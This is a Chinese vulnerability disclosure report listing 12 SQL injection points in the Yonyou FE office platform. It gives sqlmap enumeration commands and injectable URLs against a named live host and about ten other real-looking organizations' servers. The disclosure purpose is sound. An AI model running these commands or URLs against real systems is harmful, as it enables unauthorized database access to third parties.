### 简要描述:
用友通用系统漏洞打包#1
### 详细说明:
看了一天的时间,把发现的漏洞一起打包了
总共包含用友FE协同办公平台通用系统漏洞打包,包含12个SQL注入漏洞,总不会都重复嘛
漏洞的文件及参数为:
```
/sys/left.jsp?lx=1
/sys/regUI.jsp?regName=111
/sys/regListUI.jsp?searchKeyvalue=111
/sys/plugin/plugin_form_edit.jsp?done=&key=a
/security/check.jsp?name=1&id=1
/sys/plugin/plugin_datasource_edit.jsp?done=&key=a
/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync
/fenc/ncsubjass.jsp?subjcode=1
/cooperate/flow/selectUDR.jsp?id=1
/cooperate/flow/selectMUDR.jsp?id=1
/common/selectUDRTree.jsp?id=1
```
1)sql注入1
/sys/plugin/plugin_form_edit.jsp?done=&key=a
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a"
[<img src="https://images.seebug.org/upload/201409/052056317ff72fbdf3f56e2a55e6307c7a2434f7.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052056317ff72fbdf3f56e2a55e6307c7a2434f7.jpg)
2)sql注入2
/sys/regUI.jsp?regName=111
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111"
[<img src="https://images.seebug.org/upload/201409/052057550339e542168efa0d9188e0e1c748d67f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052057550339e542168efa0d9188e0e1c748d67f.jpg)
3)sql注入3
/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
sqlmap -u "http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111"
[<img src="https://images.seebug.org/upload/201409/05210826a4dd2db85a1dfad7d0de306a1532d8f4.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/05210826a4dd2db85a1dfad7d0de306a1532d8f4.jpg)
4)sql注入4
/sys/left.jsp?lx=1
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/left.jsp?lx=1"
[<img src="https://images.seebug.org/upload/201409/052100252e1c44671ed2ad1d3ef884b40d9a5327.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052100252e1c44671ed2ad1d3ef884b40d9a5327.jpg)
5)sql注入5
/security/check.jsp?name=1&id=1
sqlmap -u "http://gzwnq.88ip.cn:9090/security/check.jsp?name=1&id=1"
[<img src="https://images.seebug.org/upload/201409/05210248cda8872620c6382c02c4bfc04ab85281.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/05210248cda8872620c6382c02c4bfc04ab85281.jpg)
6)sql注入6
/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
sqlmap -u "http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111"
[<img src="https://images.seebug.org/upload/201409/05210637952ca013bba900a61efb8f29edd77dd6.jpg" alt="6.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/05210637952ca013bba900a61efb8f29edd77dd6.jpg)
7)sql注入7
/sys/regListUI.jsp?searchKeyvalue=111
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/regListUI.jsp?searchKeyvalue=111"
[<img src="https://images.seebug.org/upload/201409/052059140e808d2104f009b4567fda7dda7745cb.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052059140e808d2104f009b4567fda7dda7745cb.jpg)
其他的就不一一例举了....请检查。
给出10个其他案例:
http://220.168.210.109:9090/sys/regUI.jsp?regName=111
http://fsd2014.f3322.org:9090/sys/regUI.jsp?regName=111
http://oa.hzuf.com:9090/sys/regUI.jsp?regName=111
http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111
http://183.129.249.246:9090/sys/regUI.jsp?regName=111
http://116.7.241.29//sys/regUI.jsp?regName=111
http://oa.shunhengli.com:9090/sys/regUI.jsp?regName=111
http://oa.chnjcdc.com:9090/sys/regUI.jsp?regName=111
http://115.29.234.197:8090/sys/regUI.jsp?regName=111
http://119.145.194.122:9090/sys/regUI.jsp?regName=111
http://220.168.210.109:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://fsd2014.f3322.org:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://oa.hzuf.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://183.129.249.246:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://116.7.241.29//sys/plugin/plugin_form_edit.jsp?done=&key=a
http://oa.shunhengli.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://oa.chnjcdc.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://115.29.234.197:8090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://119.145.194.122:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a
http://220.168.210.109:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://fsd2014.f3322.org:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://oa.hzuf.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://183.129.249.246:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://116.7.241.29//permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://oa.shunhengli.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://oa.chnjcdc.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://115.29.234.197:8090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
http://119.145.194.122:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111
### 漏洞证明:
漏洞证明给出以下几个个案例:
证明1:
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a" --dbs
[<img src="https://images.seebug.org/upload/201409/052109392e62bf80cd8567b288761c38d8b89ae7.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052109392e62bf80cd8567b288761c38d8b89ae7.jpg)
证明2:
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111" --dbs
[<img src="https://images.seebug.org/upload/201409/052110476ec7998a4a03e947785adab54bb83c58.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/052110476ec7998a4a03e947785adab54bb83c58.jpg)
证明3:
sqlmap -u "http://gzwnq.88ip.cn:9090/sys/left.jsp?lx=1" --dbs
[<img src="https://images.seebug.org/upload/201409/05211124de3bf0067c62fd3168b2d72f6f348fc2.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/05211124de3bf0067c62fd3168b2d72f6f348fc2.jpg)
暂无评论